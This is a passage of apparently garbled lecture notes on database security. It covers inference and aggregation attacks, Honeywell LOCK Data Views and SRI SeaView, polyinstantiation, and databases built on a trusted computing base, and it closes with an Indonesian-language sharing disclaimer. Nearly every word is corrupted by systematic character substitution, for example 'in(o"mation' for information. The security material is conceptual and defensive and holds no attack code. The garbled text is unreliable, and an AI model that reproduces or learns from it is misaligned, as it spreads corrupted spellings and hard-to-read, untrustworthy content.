Ma%i)ios atta)$e" ma& infer sensiti3e in(o"mation 'that is hidden* ("om in(o"mation on a
data+ase that is deemed not sensiti3e 'made #+%i)*
Mo"e di((i)%t #"o+%em: atta)$e" ma& in(e" in(o"mation )om+ining 4hat/s on the data+ase
4ith 4hat is a%"ead& $no4n
Data+ase Agg"egation P"o+%em
!agian0+agian in(o"masi tida$ sensiti3e, dan men,adi sensiti3e $eti$a diga+ng$an se)a"a
+e"samaan.
1ont"o%s (o" the agg"egation #"o+%em
o Hone&4e%% LO1K Data Mie4s 'LDM* data+ase s&stem - #ie)es o( data
%a+e%ed as nonsensiti3e, agg"egates %a+e%ed as sensiti3e
o SRI SeaMie4 data+ase s&stem - #ie)es o( data %a+e%ed as sensiti3e, agg"egates
ma& then +e %a+e%ed as non sensiti3e
Po%&instantiation, a 1ont"o% Against Dis)%os"e
This a##"oa)h in3o%3es di((e"ent 3ie4s o( a data+ase o+,e)t eKisting
(o" se"s 4ith di((e"ent se)"it& att"i+tes
Add"esses the a//re/ation problem +& #"o3iding di((e"ent se)"it&
%a+e%s to di((e"ent agg"egates se#a"ate%&
Add"esses the inference problem +& #"o3iding a means (o" hiding
in(o"mation that ma& +e sed to ma$e in(e"en)es
Data+ase A##%i)ations on Se)"e !ases
Most data+ase a##%i)ations "e%& on nde"%&ing se"3i)es o( an o#e"ating s&stem
EK#o"ting these se"3i)es ("om a T1! 4o%d enhan)e the se)"it& o( the
data+ase
o data+ase $e&s im#%emented sing se)"it& %a+e%s ("om nde"%&ing T1!
o T1! $ee#s adit "e)o"ds o( o#e"ations on data+ase
o OS (i%e s&stem #"ote)tion eKtended to data+ase
DISCLAIMER
0!sm!lla"!ro"man!rro"!m
!e"ang$at da"i niat men&am#ai$an i%m, da#at%ah $i"an&a tim+%
sat ha"a#an aga" d!#tat Y tul!san Y ran#um mater! Y re-
organizing paper &ang te%ah di+at ini da#at +e"man(aat +agi sema
&ang mem+th$ann&a.
Sia#a #n di#e"si%ah$an nt$ mengam+i%n&a, mengti#n&a,
meman(aat$ann&a dengan sema$sima% mng$in. Si%ah$an
mem#e"+an&a$, men)eta$, meng0)o#&0n&a dengan +e+as gna
$e%an)a"an t"ans(e" i%m #engetahan. Dan a#a+i%a diman(aat$an
nt$ sesat &ang +e"si(at $ome"sia%, ada +ai$n&a da#at
menga+a"$an te"%e+ih dah%, se$eda" #em+e"itahan, atas
$eho"matan &ang di+e"i$an te"se+t.
B a h a r,S.Kom
6a4s&a.mmRgmai%.)om